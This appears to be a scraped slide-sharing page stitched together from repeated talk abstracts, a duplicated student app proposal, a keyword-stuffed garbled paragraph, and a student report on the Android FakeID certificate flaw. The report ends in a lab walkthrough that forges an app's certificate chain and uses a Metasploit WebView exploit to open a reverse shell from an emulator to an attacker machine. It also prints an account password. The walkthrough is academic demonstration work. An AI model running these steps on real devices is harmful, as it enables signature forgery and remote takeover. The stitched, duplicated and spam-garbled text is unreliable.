This document summarizes a student project that demonstrated the Android FakeID vulnerability. The vulnerability allows an attacker to modify the certificate of a malicious app to pretend it was signed by a trusted certificate authority, fooling the Android OS into granting it additional permissions. The students created two apps: one that could open websites, and another that could request websites be opened. By default, the request was denied due to insufficient permissions. However, by modifying the certificate of the second app to reference the first app's certificate, the vulnerability was demonstrated as the OS now granted the necessary permissions and allowed the website request. This showed how an attacker could exploit the lack of certificate verification in early Android to gain unauthorized access.
In May's Microsoft identity platform call, Navya Canumalla went into detail on MSAL Java and Python, including an overview, supported scenarios and calling patterns. Quickstart demo, token cache and ADAL to MSAL migration.
View recording https://youtu.be/yCCjNqFva9w
Resources:
MSAL Java https://aka.ms/msaljavadocs
MSAL Python https://aka.ms/msalpythondocs
Stay connected
Twitter https://twitter.com/microsoft365dev
YouTube https://aka.ms/M365DevYouTube
Blogs https://aka.ms/M365DevBlog
LF_APIStrat17_OWASP’s Latest Category: API UnderprotectionLF_APIStrat
OWASP’s 2017 top ten adds a new category called 'underprotected APIs', reflecting the growth of RESTful Web APIs and richer front-end clients which stress current security and access authorization approaches. You’ll learn about potential threats resulting from undersecured Web APIs and techniques to strengthen your API security posture. You'll gain a clear understanding of user authorization via OAuth2, software authorization via static API keys and the critical interplay between them. Of particular concern are mobile API consumers whose code is statically published with secrets which are often poorly concealed. Practical advice with code examples will show how to improve mobile API security. TLS is necessary but insufficient to fully secure client-server communications. Certificate pinning is explained with code examples to show how to strengthen channel communications. Some advanced techniques will be discussed such as app hardening, white box cryptography and mobile app attestation. You should gain a good understanding of the underprotected API problem, with some immediately practical tips to improve your API security posture and a sense of emerging tools and technologies that enable a significant step change in API security.
Mobile Single Sign-On: OAuth 2.0, OpenID Connect, NAAPS, why doesn’t anything work and can we do better? -- Brian Campbell, Ping Identity - - - Mobile computing has grown at an unprecedented rate in recent years while innovations in identity and Single Sign-On on mobile have lagged behind. We'll look at the state of native mobile application SSO including applicable standards such as OAuth 2.0, OpenID Connect, and NAAPS, and try to better understand the bigger picture of what's happening and what might be done to improve things.
-- from 2015 http://gluecon.com/
In May's Microsoft identity platform call, Navya Canumalla went into detail on MSAL Java and Python, including an overview, supported scenarios and calling patterns. Quickstart demo, token cache and ADAL to MSAL migration.
View recording https://youtu.be/yCCjNqFva9w
Resources:
MSAL Java https://aka.ms/msaljavadocs
MSAL Python https://aka.ms/msalpythondocs
Stay connected
Twitter https://twitter.com/microsoft365dev
YouTube https://aka.ms/M365DevYouTube
Blogs https://aka.ms/M365DevBlog
LF_APIStrat17_OWASP’s Latest Category: API UnderprotectionLF_APIStrat
OWASP’s 2017 top ten adds a new category called 'underprotected APIs', reflecting the growth of RESTful Web APIs and richer front-end clients which stress current security and access authorization approaches. You’ll learn about potential threats resulting from undersecured Web APIs and techniques to strengthen your API security posture. You'll gain a clear understanding of user authorization via OAuth2, software authorization via static API keys and the critical interplay between them. Of particular concern are mobile API consumers whose code is statically published with secrets which are often poorly concealed. Practical advice with code examples will show how to improve mobile API security. TLS is necessary but insufficient to fully secure client-server communications. Certificate pinning is explained with code examples to show how to strengthen channel communications. Some advanced techniques will be discussed such as app hardening, white box cryptography and mobile app attestation. You should gain a good understanding of the underprotected API problem, with some immediately practical tips to improve your API security posture and a sense of emerging tools and technologies that enable a significant step change in API security.
Mobile Single Sign-On: OAuth 2.0, OpenID Connect, NAAPS, why doesn’t anything work and can we do better? -- Brian Campbell, Ping Identity - - - Mobile computing has grown at an unprecedented rate in recent years while innovations in identity and Single Sign-On on mobile have lagged behind. We'll look at the state of native mobile application SSO including applicable standards such as OAuth 2.0, OpenID Connect, and NAAPS, and try to better understand the bigger picture of what's happening and what might be done to improve things.
-- from 2015 http://gluecon.com/
The liferay case: lessons learned evolving from RPC to Hypermedia REST APIsJorge Ferrer
Liferay is an open source platform started in 2000, long before the term “Web API” existed. One early characteristic of Liferay has been its great extensibility, which included providing a featureful HTTP API to access its functionalities since the very beginning. Initially this API used SOAP (as well as other less used protocols). Later a new “RESTful” option was added, leveraging HTTP+JSON and it became much more popular (even though it was at Level 0 in Richardson Maturity Model). However, both approaches lead users of the API to have a high coupling that makes the evolution of the APIs a challenging task. So we started wondering, isn’t there a better way to build APIs in 2017?
This session explains our search to find a better alternative and what we learned along the way.
It focuses on how we have adopted Hypermedia and Shared Vocabularies to create a new breed of APIs that we believe form the secret ingredients that solve the most important challenge we have in the API Economy: evolvability. We are now successfully applying this type of APIs in all of our products, on premise, cloud based, … even internal.
We have found that once you know how and build some common foundation, all the barriers to build evolvable APIs disappear. We learned from many others along the way and want to contribute back by sharing our experience.
IBM Index Conference - 10 steps to build token based API SecuritySenthilkumar Gopal
"10 steps to build token based API Security" is a presentation about building robust token systems for protecting APIs. This was presented as part of Index Conference.
Ever wonder how a large iOS software product is architected, developed and maintained? Wouldn’t it be neat to see the insides of a working iOS application to get ideas on how to solve your own problems? WordPress for iOS might be exactly what you’re looking for.
WordPress for iOS has been in the Apple App Store since 2008. It is a huge codebase with a lot of contributors to it. The application is entirely open-sourced which lets you explore how its been architected and how each piece works.
In this session you will learn about how WordPress for iOS is developed, the thought that went into the architecture, how a large dev team works with it and also specifics about the implementation in Xcode. You should be able to walk away from this talk with an understanding of how the app works enough to start contributing code for bug fixes and new features.
Talk given at 360iDev 2015 in Denver, CO USA.
ReactJS Vs React Native: Understanding Differences, Advantages, DisadvantagesTechtic Solutions
Here's an in-depth comparison of ReactJS vs React Native which will help you to understand the differences Advantages, Disadvantages. Meanwhile, Techtic Solutions is one of the top-notch ReactJS and React Native app Development Company with 10+ years of web development experience. Our teams of experienced ReactJS and React Native app developers are adept at building simple to the most complex website apps seamlessly. Get in touch if you are looking to hire ReactJS and React Native developers to deliver secure, high-performance, and faster web applications. Call us at +1 201.793.8324 or visit us https://www.techtic.com/react-native-app-development/
The workshop will also provide a thorough guide on how the mobile applications can be attacked and provide an overview of how some of the most important security checks for the applications are applied and get an in-depth understanding of these security checks.
Course Content:
Android Introduction & Basics
Setting up the Pen testing environment
Reverse engineering & runtime manipulation
Application dynamic runtime analysis
Application Components and security issues
Data and Network interception – manipulation and analysis
Defensive Tools & Techniques for Android application
Goes through 7 scenarios where a fictional developer Bob chooses ways to achieve them that work, but have some flaws in them. Must-have knowledge for any developer working with Azure Active Directory.
Building an SSO platform in php (Zendcon 2010)Ivo Jansch
A presentation explaining how to build Single Sign On functionality in PHP using standards such as OpenID, OAuth and SAML. Delivered on November 4, 2010 at Zendcon in Santa Clara
Updated version of my PHP in a mobile ecosystem talk. Looks at how PHP plays a role in the mobile world, and explains what php developers need to know about mobile development.
Presentation delivered at the PHPBenelux 2011 conference and the PHP UK conference 2011.
Best Practices for Application Development with BoxJonathan LeBlanc
Covering the best practices for building new applications on top of Box platform, including token management, error condition and program flow, architecture, and other such topics.
Every mobile marketer has heard the acronym “SDK” bandied about in discussions with their product and customer support teams. But how many marketers have actually asked: ”What does SDK stand for?”
To shed light on the SDK meaning as well as to understand how a mobile SDK can benefit your app, check out this SlideShare!
The liferay case: lessons learned evolving from RPC to Hypermedia REST APIsJorge Ferrer
Liferay is an open source platform started in 2000, long before the term “Web API” existed. One early characteristic of Liferay has been its great extensibility, which included providing a featureful HTTP API to access its functionalities since the very beginning. Initially this API used SOAP (as well as other less used protocols). Later a new “RESTful” option was added, leveraging HTTP+JSON and it became much more popular (even though it was at Level 0 in Richardson Maturity Model). However, both approaches lead users of the API to have a high coupling that makes the evolution of the APIs a challenging task. So we started wondering, isn’t there a better way to build APIs in 2017?
This session explains our search to find a better alternative and what we learned along the way.
It focuses on how we have adopted Hypermedia and Shared Vocabularies to create a new breed of APIs that we believe form the secret ingredients that solve the most important challenge we have in the API Economy: evolvability. We are now successfully applying this type of APIs in all of our products, on premise, cloud based, … even internal.
We have found that once you know how and build some common foundation, all the barriers to build evolvable APIs disappear. We learned from many others along the way and want to contribute back by sharing our experience.
IBM Index Conference - 10 steps to build token based API SecuritySenthilkumar Gopal
"10 steps to build token based API Security" is a presentation about building robust token systems for protecting APIs. This was presented as part of Index Conference.
Ever wonder how a large iOS software product is architected, developed and maintained? Wouldn’t it be neat to see the insides of a working iOS application to get ideas on how to solve your own problems? WordPress for iOS might be exactly what you’re looking for.
WordPress for iOS has been in the Apple App Store since 2008. It is a huge codebase with a lot of contributors to it. The application is entirely open-sourced which lets you explore how its been architected and how each piece works.
In this session you will learn about how WordPress for iOS is developed, the thought that went into the architecture, how a large dev team works with it and also specifics about the implementation in Xcode. You should be able to walk away from this talk with an understanding of how the app works enough to start contributing code for bug fixes and new features.
Talk given at 360iDev 2015 in Denver, CO USA.
ReactJS Vs React Native: Understanding Differences, Advantages, DisadvantagesTechtic Solutions
Here's an in-depth comparison of ReactJS vs React Native which will help you to understand the differences Advantages, Disadvantages. Meanwhile, Techtic Solutions is one of the top-notch ReactJS and React Native app Development Company with 10+ years of web development experience. Our teams of experienced ReactJS and React Native app developers are adept at building simple to the most complex website apps seamlessly. Get in touch if you are looking to hire ReactJS and React Native developers to deliver secure, high-performance, and faster web applications. Call us at +1 201.793.8324 or visit us https://www.techtic.com/react-native-app-development/
The workshop will also provide a thorough guide on how the mobile applications can be attacked and provide an overview of how some of the most important security checks for the applications are applied and get an in-depth understanding of these security checks.
Course Content:
Android Introduction & Basics
Setting up the Pen testing environment
Reverse engineering & runtime manipulation
Application dynamic runtime analysis
Application Components and security issues
Data and Network interception – manipulation and analysis
Defensive Tools & Techniques for Android application
Goes through 7 scenarios where a fictional developer Bob chooses ways to achieve them that work, but have some flaws in them. Must-have knowledge for any developer working with Azure Active Directory.
Building an SSO platform in php (Zendcon 2010)Ivo Jansch
A presentation explaining how to build Single Sign On functionality in PHP using standards such as OpenID, OAuth and SAML. Delivered on November 4, 2010 at Zendcon in Santa Clara
Updated version of my PHP in a mobile ecosystem talk. Looks at how PHP plays a role in the mobile world, and explains what php developers need to know about mobile development.
Presentation delivered at the PHPBenelux 2011 conference and the PHP UK conference 2011.
Best Practices for Application Development with BoxJonathan LeBlanc
Covering the best practices for building new applications on top of Box platform, including token management, error condition and program flow, architecture, and other such topics.
Every mobile marketer has heard the acronym “SDK” bandied about in discussions with their product and customer support teams. But how many marketers have actually asked: ”What does SDK stand for?”
To shed light on the SDK meaning as well as to understand how a mobile SDK can benefit your app, check out this SlideShare!
HOMO SAPIENS or HOMO BRUTUS: HUMAN ONTOLOGY: On the Essence of Human BeingsAzamat Abdoullaev
HOMO SAPIENS as HOMO BRUTUS
Humanity = Monstrous Animality
Man is the only animal whose community led by mediocrities or abnormalities
FROM HUMANITY 1.0 to HUMANITY X.0
“14,500 wars have taken place between 3500 BC and the late 20th century, costing 3.5 billion lives, leaving only 300 years of peace”
CIS13: Taking the Hyperspace Bypass: Controlling User Access to Other WorldsCloudIDSummit
Dale Olds, Senior Staff Engineer, VMware
If identity is the new perimeter, then users must be able to access applications anywhere: on premise, in the cloud or on partner sites. To enable this access we must take identity information into other worlds, and there is no Babel Fish. This session will explain how to enable access to distributed applications without making users feel like Marvin the Paranoid Android. We will cover topics like federated authentication, browser single sign-on and delegated authorization for cloud APIs. Standards in this area are essential, but SAML, OAuth2, SCIM and OpenID can sound like Vogon poetry. We'll touch on the standards, but keep the Vogon poetry to a minimum.
OAuth 2.0 and Mobile Devices: Is that a token in your phone in your pocket or...Brian Campbell
Gluecon 2012 presentation on using OAuth 2.0 with mobile applications to utilize social logins. "Is that a token in your phone in your pocket or are you just glad to see me? OAuth 2.0 and Mobile Devices"
iOS Code Signing Certificate that must have iOS developers to ensure integrity of software code, applications, .exe, etc. Easy guide on iOS code signing security.iOS Code Signing Certificate that must have iOS developers to ensure integrity of software code, applications, .exe, etc. Easy guide on iOS code signing security.
Remote Exploitation of the Dropbox SDK for AndroidIBM Security
The IBM X-Force Application Security Research Team has discovered a vulnerability in the Dropbox SDK for Android (CVE-2014-8889) which allows attackers to connect applications on mobile devices to a Dropbox account controlled by the attacker without the victim's knowledge or authorization. This is a serious flaw in the authentication mechanism within any Android app using a Dropbox SDK Version 1.5.4 through 1.6.1
21 | Page
Conference Android ApplicationSoftware Reengineering Project Document
SWE400-1402B-01 Software Construction
Project Proposal
· Approved
· Not Approved
Sr.#
Student ID
Student Name
*Signature
1
ID
Name1
2
ID 2
Name 2
3
*The candidates confirm that the work submitted is their own and appropriate credit has been given where reference has been made to work of others
Supervisor Name:
Designation: ____________________
Signature: ____________________
Co-Supervisor Name: ____________________
Designation: ____________________
Signature: ____________________
Abstract
My Conference android application is used to book meetings between attendees in the conferences and seminars. Attendees can book meetings with other users in the conference. Attendees have to register in the application.
Introduction
My Conference application is used by different seminars and conferences to assist users to book meetings with each other. The attendees in the conference need to be registered in the application. These users can login and see other registered users in the conference. They can access name, company and details of other users. These users can book meeting with other attendees. The other attendee will see who has booked meeting with him. Meetings can be booked with meetings names, meeting details and time. The application interacts with java server (J2EE project) to receive request from application. Requests are processed in MySQL database and response is sent back to application.
Application has the following modules to be made:
1. Registration
2. Sending password to Email
3. Attendees list display
4. Book Meetings
5. Database management
Motivation and Scope
My Conference android application streamlines the meeting appointments process traditional reporting systems. It replaces the manual meeting booking system which consumes time. This advanced software can eliminate all time constraints. It allows users to check other user’s company’s names and their designations before meeting. You do not have to do special meetings.
System Architecture
Our system will be java web and mobile platform based.
Goals and Objectives
The goal and objective of our project is:
· To optimize the meetings appointment process in the conferences.
· It will be simple and user friendly
· As its paperless system and it will be web based. So can be access from anywhere.
· Using new technologies and tools to make it efficient.
Future Work
We are building conference application in such a way that it can be extended for modules other than meetings that are required in the conference. For example along with meeting appointment we can extend it to perform meetings via video conferencing.
Tools and Technologies
The tools and technologies which will be using are
· Android Platform.
· J2EE based server
· MySQL server
· My SQL workbench
· Eclipse for Android
· Eclipse (J2EE enabled) for java server
· Tomcat server apache-tomcat-7.0.30 to run serv.
Mobile API Test With Web Proxy
At Haptik is an AI mobile app developers, app development for Android app developers & iOS app developers for customer support. We have also app development our SDKs which could be plugged into any other flutter development in the app development market and it makes a lot of use Haptik chatbots inside their flutter developers. There is mobile app developers storage, app development network, computation, handling mobile app developers user messages, giving back responses via API calls, etc.
Mobile app developers API testing
It is a kind of software developers testing that involves app development testing software development programming interfaces at once and as a part of integration web development testing for functionality, app developers performance, and security.
Proxy app developers server
A proxy server is a web development server that acts as a gateway among a consumer app development, for example, a software developers browser, and the actual web development server. It makes requests to the actual app developers server on behalf of the customer or sometimes fulfills the claim itself. It used to control mobile app developers internet access, Privacy benefits, Access blocked web developers sites, app development security, speeds, and bandwidth savings. On our app developers we make use of web developers Sockets to app developers send and receive messages, make numerous mobile app developers API requirements dealing with various capabilities at the app development, and loads more. To find problems in our flutter development and make the end-user app developers experience better we wanted to check out different situations like bad network connectivity web development sockets working, slow third-party API responses, etc.
Test web developers sockets & APIs
Throttle app developers functionality adjusts the bandwidth and latency of the network software developers functionality helps to simulate app development phoenix versions of generation over a high-speed WIFI network enables app development testing the app developers behavior in poor network connections. Web development Testing on poor network app developers connections is the software developers most important situation for a chatbot app development like functionalities that require the app developers user to be notified without any delay.
It mobile app developers personalized message app developers receives a mobile app developers personalized call to remind him/her about the event. We app developers wanted to check what happens during web developers network latency, or interruptions and how the app development handles it and definitely able to web development test all using the app developers network Throttle software development feature.
1 | Page
Conference Android ApplicationSoftware Reengineering Project Document
SWE400-1402B-01 Software Construction
1st June 2014
Project Proposal
· Approved
· Not Approved
Sr.#
Student ID
Student Name
*Signature
1
ID
Name1
2
ID 2
Name 2
3
*The candidates confirm that the work submitted is their own and appropriate credit has been given where reference has been made to work of others
Supervisor Name:
Designation: ____________________
Signature: ____________________
Co-Supervisor Name: ____________________
Designation: ____________________
Signature: ____________________
Abstract
My Conference android application is used to book meetings between attendees in the conferences and seminars. Attendees can book meetings with other users in the conference. Attendees have to register in the application.
Introduction
My Conference application is used by different seminars and conferences to assist users to book meetings with each other. The attendees in the conference need to be registered in the application. These users can login and see other registered users in the conference. They can access name, company and details of other users. These users can book meeting with other attendees. The other attendee will see who has booked meeting with him. Meetings can be booked with meetings names, meeting details and time. The application interacts with java server (J2EE project) to receive request from application. Requests are processed in MySQL database and response is sent back to application.
Application has the following modules to be made:
1. Registration
2. Sending password to Email
3. Attendees list display
4. Book Meetings
5. Database management
Motivation and Scope
My Conference android application streamlines the meeting appointments process traditional reporting systems. It replaces the manual meeting booking system which consumes time. This advanced software can eliminate all time constraints. It allows users to check other user’s company’s names and their designations before meeting. You do not have to do special meetings.
System Architecture
Our system will be java web and mobile platform based.
Goals and Objectives
The goal and objective of our project is:
· To optimize the meetings appointment process in the conferences.
· It will be simple and user friendly
· As its paperless system and it will be web based. So can be access from anywhere.
· Using new technologies and tools to make it efficient.
Future Work
We are building conference application in such a way that it can be extended for modules other than meetings that are required in the conference. For example along with meeting appointment we can extend it to perform meetings via video conferencing.
Tools and Technologies
The tools and technologies which will be using are
· Android Platform.
· J2EE based server
· MySQL server
· My SQL workbench
· Eclipse for Android
· Eclipse (J2EE enabled) for java server
· Tomcat server apache-tomcat-7.0.3 ...
Federation Evolved: How Cloud, Mobile & APIs Change the Way We Broker IdentityCA API Management
Understanding how emerging standards like OAuth and OpenID Connect impact federation
Federation is a critical technology for reconciling user identity across Web applications. Now that users consume the same data through cloud and mobile, federation infrastructure must adapt to enable these new channels while maintaining security and providing a consistent user experience.
This webinar will examine the differences between identity federation across Web, cloud and mobile, look at API specific use cases and explore the impact of emerging federation standards.
You Will Learn
Best practices for federating identity across mobile and cloud
How emerging identity federation standards will impact your infrastructure
How to implement an identity-centric API security and management infrastructure
Presenters
Ehud Amiri
Director, Product Management, CA Technologies
Francois Lascelles
Chief Architect, Layer 7
A Code Signing Certificate is a digital signature technology allows authorized software publishers to sign their software code, script and content to authenticate their identification over internet.
Quickly Build a Native Mobile App for Your Community Using Salesforce Mobile SDKSalesforce Developers
Join us to learn how to take a Visualforce-based community you built for the browser and convert it into a native app by using Salesforce Mobile SDK. You can then submit this native app into Apple's App store or Google Play without learning Objective-C or Android.
1. Android FakeID Vulnerability
Final Project Report
High Level Description:
Group: 3
Members: Mark Laubender, Scott Weiss, Hao Hu, Zack Webster, Brett Kaplan
Project Type: Conference Talk
Project Specifics: Android FakeID Vulnerability - a vulnerability in Android OS version 4.3 and earlier
where the cryptography of self signed certificates is not checked by the operating system, allowing an
attacker to modify the self signed certificate for a malicious program and convince the OS that its
certificate was issued by a trusted certificate authority.
References
BlueBox Security Blog:
https://bluebox.com/technical/android-fake-id-vulnerability/
https://bluebox.com/technical/questioning-the-chain-of-trust-investigations-into-the-root-certificates-on-
mobile-devices/
The BlueBox Security Blogs explained the vulnerability in more detail than the conference talk.
Jeff Forristal:
jeff@bluebox.com
Mr. Forristal was contacted at the beginning of our project and while he did not give us many answers, he
gave valuable background into the working of this vulnerability.
Android
Xref: http://androidxref.com/4.3_r2.1/xref/frameworks/base/core/java/android/webkit/PluginManager.java
Line 77 of the android Xref contains a hardcoded copy of an Adobe certificate. Without this certificate
there would be nothing for us to sign another apk with.
Video Presentation Slides:
https://www.blackhat.com/docs/us-14/materials/us-14-Forristal-Android-FakeID-Vulnerability-
Walkthrough.pdf
the video presentation slides were used as a reference, especially in changing the certificate of an apk.
Stackoverflow:
http://stackoverflow.com/questions/12456453/is-it-possible-to-generate-correct-pkcs12-pfx-file-in-python
stackoverflow was invaluable to our group when we were altering our apk's certificate, and this python
2. script served as our model in creating our own.
http://stackoverflow.com/questions/22211140/conversion-x-509-certificate-represented-as-a-hex-string-
into-pem-encoded-x-509
Found an opensssl command with the help of stackoverflow that allowed us to convert the hard-coded
adobe signature to an actual cert file (PEM format) we could wrap with our own cert.
https://cyberarms.wordpress.com/2014/02/26/android-webview-exploit-tutorial-70-of-devices-vulnerable/
An exploit we used in the malware we crafted to demonstrate the FakeID vulnerability
http://stackoverflow.com/questions/9293019/get-certificate-fingerprint-from-android-app
Info on how to write a program that checks certificates at runtime. This allows us to demonstrate
the FakeID vulnerability using our own exploit (since we are unable to
recreate the Adobe Plugin Manager exploit).
Technical Content:
The focus of this vulnerability is Public Key Infrastructure (PKI); specifically, public certificates and self-
signed certificate chaining. Under the PKI paradigm, all certificates as well as the data they contain are
hashed using a hash (message digest) algorithm and encrypted with a private key to form a signature.
Prior to KitKat (v4.4), Android did not check the validity of the certificate. This means that anyone with the
know-how can modify a certificate.
Each certificate contains the signature of its Certificate Authority, the entity which issued the certificate.
Operating systems and web browsers typically have a number of implicitly trusted Certificate Authorities;
e.g., Google, Adobe, Microsoft, etc. When the operating system or web browser receives a self-signed
certificate that is issued by a CA, it will treat it as though it is one of the CAs. This will give the application
permissions on the system that are only allowed for applications signed by the CA. For example, this
means that any program that is signed with a certificate issued by Adobe will have permissions to update
Adobe software installed on the device.
Each certificate has an ‘issuer’ field which refers to another certificate which indicates that the Certificate
Authority (CA) which issued the parent certificate also issued this certificate. This allows long series of
certificates to be chained together all under a single Certificate Authority. These certificate chains are
common in PKI architecture. When an operating system or web browser encounters a self-signed
certificate, it must process the entire certificate chain in order to determine whether the certificate has a
Certificate Authority that is trusted in order to determine what permissions the certificate is valid for.
Android platforms predating OS KitKat (v 4.4) did not check the cryptographic validity of self signed
certificates, meaning that certificates could be modified, breaking their cryptography, but not invalidating
their signature when read by the system. When checking the CA of a certificate, Android simply scans the
3. certificate chain for a trusted CA and stops there. It is therefore possible for an attacker to generate a self-
signed signature for a malicious app, modify the signature to claim it was issued by a trusted CA, and
then obtain permissions for that app from the OS which are reserved for apps genuinely signed by the
trusted CA.
Jeff Forristal’s Blackhat 2014 presentation demonstrated an exploit which disguised itself as an update for
Adobe apps using a Webview Plugin. By signing a malicious app with a cert modified to make it look like
it was issued by Adobe, Forristal demonstrated that the app was given permission by the OS to update
Adobe apps, which allowed him to inject code into apps installed on the device that would open a reverse
shell.
Our implementation used a similar vector to demonstrate the FakeID vulnerability. Because we were
unable to craft an app which injected code into real Adobe apps, we instead emulated restricted
permissions by creating our own exploitable app which will open a website given to it by another app
given that app has the correct permission to do so. The ‘victim’ app compares the signature of the exploit
app to a hardcoded signature (the same way that the Adobe Plugin Manager checks the signature of
Jeff’s malicious ‘update’), leaving the responsibility of ensuring the cryptography of the certificate to
Android. If the exploit app is not signed with proper signature, it will not have permission to communicate
with the victim app.
After creating both the victim app (that opens a website) and the exploit app (that sends the website
address and the command to open it), we generated separate self-signed certs for both apps. If, at this
point, both apps are installed on the device, the victim app is run, and then the exploit app is run and
used to send the website to the victim app, the victim app will reply with the message ‘invalid
permissions’. However, if we modify the exploit app’s cert using a simple python script to reference the
vulnerable app’s cert as its issuer and upload the exploit app to the device, the vulnerable app will
recognize it as having the correct permissions. Like the Adobe exploit, the responsibility for verifying the
cert’s cryptography is left to the OS.
Limitations:
Our original intent was to craft the same exploit that the FakeID conference talk demonstrated. We
originally misunderstood how Jeff was able to run an exploit app that opened a reverse shell without
asking for any permissions from the device. We thought this was because Android has hard-coded
permissions for trusted CAs that it automatically grants to apps when it recognizes a trusted CA in the
certificate chain when an app is installed. While it is true that Android does have hard-coded permissions
for trusted CAs, the permission Jeff’s exploit used was not internet access permission or access to SMS,
email, etc. that a reverse shell would require. Instead, it was the permission to modify code in Adobe apps
already installed on the device, i.e. the permission to update Adobe apps via the web.
We were successful in signing our cert with Adobe’s signature, but doing so gave us no practical exploit
4. to demonstrate. It was beyond our knowledge and understanding to write an app that can modify the
binary of another app (it may require a complex knowledge of how the target apps actually work in order
to forge an update for them). We spent time trying to reverse engineer the binary of an actual Adobe flash
player update. We unpacked the apk and decompiled the class files within and spent some time trying to
figure out how we could add arbitrary code for execution into the flash player through the update. But
even getting the decompiled code to compile was extremely difficult and eventually proved to be a dead
end.
We had no way to actually demonstrate that we now had permission to update Adobe apps because we
couldn’t create the app to inject code in the first place. Instead, we switched focus on trying to
demonstrate the concept at work in this vulnerability. We created our own target app, that, instead of
receiving an ‘update’ by having its binary modified, simply receives a string and attempts to open it up as
a URL. We mimicked Adobe Plugin Manager’s method for verifying the signature of the update app,
which hard-coded Adobe’s public signature and string matched it against the signature of the update app.
So long as the self-signed certificate of the exploit app is modified to point to the certificate of the victim
app as its issuer, it is able to pass the string and command the victim app to open the URL. If the cert is
not modified, then the user is notified that they do not have appropriate permissions and the URL is not
opened.
Materials
Materials needed to run:
project files attached:
o workingCertSign.py
o CheckCert eclipse project
o Exploit eclipse project
A way to compile Android apk's:
o we used eclipse IDE with the latest version of ADT and Android SDK
1. visit the page http://developer.android.com/sdk/installing/index.html?pkg=adt
and follow the link to download the Eclipse ADT bundle
2. Unpack the ZIP file (named adt-bundle-{os_platform}.zip) and save it to an
appropriate location, such as a "Development" directory in your home directory.
3. Open the adt-bundle-{os_platform}/eclipse/ directory and launch Eclipse.
4. Caution: Do not move any of the files or directories from the adt-bundle-
{os_platform} directory. If you move the eclipse/ or sdk/ directory, ADT will not be
able to locate the SDK and you'll need to manually update the ADT preferences.
A way to run Android applications:
o we used Genymotion (Oracle VirtualBox must be installed)
5. 1. visit the page https://cloud.genymotion.com/page/launchpad/download/ and
download the correct version of Genymotion
2. if you are prompted for a username/password you may use “mlaubend”/“ec521”
3. run the following commands:
chmod +x {Genymotion installer path}/genymotion-{version}_{arch}.bin
cd
./genymotion-{version}_{arch}.bin -d {Genymotion installer path}
4. run Genymotion using the following command
cd {Genymotion installer path}
./genymotion
5. Note: make sure that the dkms package is installed and that it
compiles VirtualBox kernel modules each time a new kernel update is available.
To do so, run
Android Debug Bridge (ADB)
o You can find the adb tool in {sdk}/platform-tools/
Instructions to run:
extracting the adobe certificate from Xref:
navigate to line 77 of the Android Xref
o http://androidxref.com/4.3_r2.1/xref/frameworks/base/core/java/android/webkit/PluginMan
ager.java
copy the hex-string into a text file and run the following command
o cat {your text file}.txt | xxd -r -p | openssl x509 -inform DER -out adobeCert.pem -outform
PEM
a new file adobeCert.pem should appear in your directory
creating the keystore from an Adobe certificate:
make sure the attached python script workingCertSign.py and adobeCert.pem are in the same
directory
navigate to the directory and run the python script
o python workingCertSign.py
the new file container.pfx should appear in your directory
now run the following command to create a keystore from the container.pfx file
o keytool -v -importkeystore -srckeystore container.pfx -srcstoretype PKCS12 -
destkeystore my.keystore -deststoretype JKS
input the new destination keystore password 123456
input the source keystore password 1234
the new file my.keystore should appear in your directory
6. starting the metasploit server
open a terminal in kali linux and type msfconsole
when the metasploit framework has loaded, type the following command
o use exploit/android/browser/webview_addjavascriptinterface
now insert the following commands to configure your metasploit server
o set URIPATH Security
o set LHOST {your kali ipaddr}
o exploit
the metasploit server should now start
building the apps:
run eclipse and import the provided directories CheckCert and Exploit into two separate Android
projects
o file → import → existing projects into workspace
o select one of the provided directories as root directory and click finish
line 32 in CheckCert must be modified. Replace the IP address shown with your own kali IP
follow the steps to export both projects into apk's
o file → export → Export Android Application
o select one of the two projects when prompted
o select Create new keystore
select a location directory (irrelevant) and keystore name (irrelevant)
select a password (irrelevant)
o input the required forms in the Key Creation menu (irrelevant)
o input the directory holding your my.keystore as the Destination for the APK file
deleting default certificate in Exploit.apk:
once the apk's have been exported, the Export.apk certificate must be removed before a new one
can be written
o the easiest way to do this is to rename Export.apk to Export.zip
o open Export.zip with archive manager and delete the META-INF directory
o rename Export.zip to Export.apk
use my.keystore to sign the apk using the following command
o jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore adobe.keystore
Exploit.apk 1
o Passphrase for keystore: 123456
7. o key password for 1: 1234
NOTE: as part of our demonstration, do not remove the default certificate in CheckCert.apk
installing and running on the Android virtual device:
start genymotion
o cd {Genymotion installer path}
o ./genymotion
click add to create a new Android virtual device
sign in using the genymotion credentials above and select Google Galaxy Nexus -4.1.1 – API 16
select your new virtual device and click start
use adb to push both apk's to the Android emulator
o ensure adb can see the emulator
adb devices
o adb push Exploit.apk /sdcard/Download
o adb push CheckCert.apk /sdcard/Download
in your android virtual device, use the file manager application to navigate to /sdcard/Download
click on Exploit.apk to install it, but do not run it (must be installed first)
o note the permissions (network access)
click on CheckCert.apk to install it and run it
o note the permissions (none!)
o if asked, use Exploit as the service to open
CheckCert.apk will attempt to send a web address to Exploit, but will be denied due to inadequate
permissions
be sure to click “refresh” in Exploit before continuing
gaining extra permissions through certificate manipulation
delete CheckCert from the virtual device by dragging and dropping into the uninstall folder
on your desktop navigate to the directory containing the original CheckCert.apk
rename CheckCert.apk to CheckCert.zip
open CheckCert.zip with archive manager and delete the META-INF directory
rename CheckCert.zip to CheckCert.apk
use my.keystore to sign the apk using the following command
o jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
my.keystore CheckCert.apk 1
o Passphrase for keystore: 123456
o key password for 1: 1234
use adb to push CheckCert.apk to the Android emulator
8. o adb push CheckCert.apk /sdcard/Download
in your android emulator, use the file manager application to navigate to /sdcard/Download
click on CheckCert.apk to install it and run it
o if asked, use Exploit as the service to open
CheckCert.apk will gain the extra permissions given to it from the new certificate and successfully
send a web address to Exploit
the web address will use the addjavascriptinterface exploit from the metasploit framework to open
a reverse shell from the Emulator to your kali machine
o in your metasploit terminal type the following commands to open the reverse shell
sessions -i 1
sysinfo
o note the operating system information (Android 4.1.1)
Live exercise:
Explanation:
Our live exercise will be composed of a demonstration of the FakeID vulnerability. One app(app1) was
crafted that shows websites in the form of a webview, and another app(app2) was crafted to insert
websites into the previous app only if that app2 has the proper permissions. We will show that app1 will
not open the website given to it by app2. We will then sign app2 with the proper certificate, which will
make app2 inherit the permissions given to it by the certificate. We will then show that app1 will now open
the website given to it by app2, making sure to enforce that no cryptographic checking was involved, and
no permissions were consciously granted to app2.
Setup:
Our group will need access to the projector and an HDMI cable connected to the projector.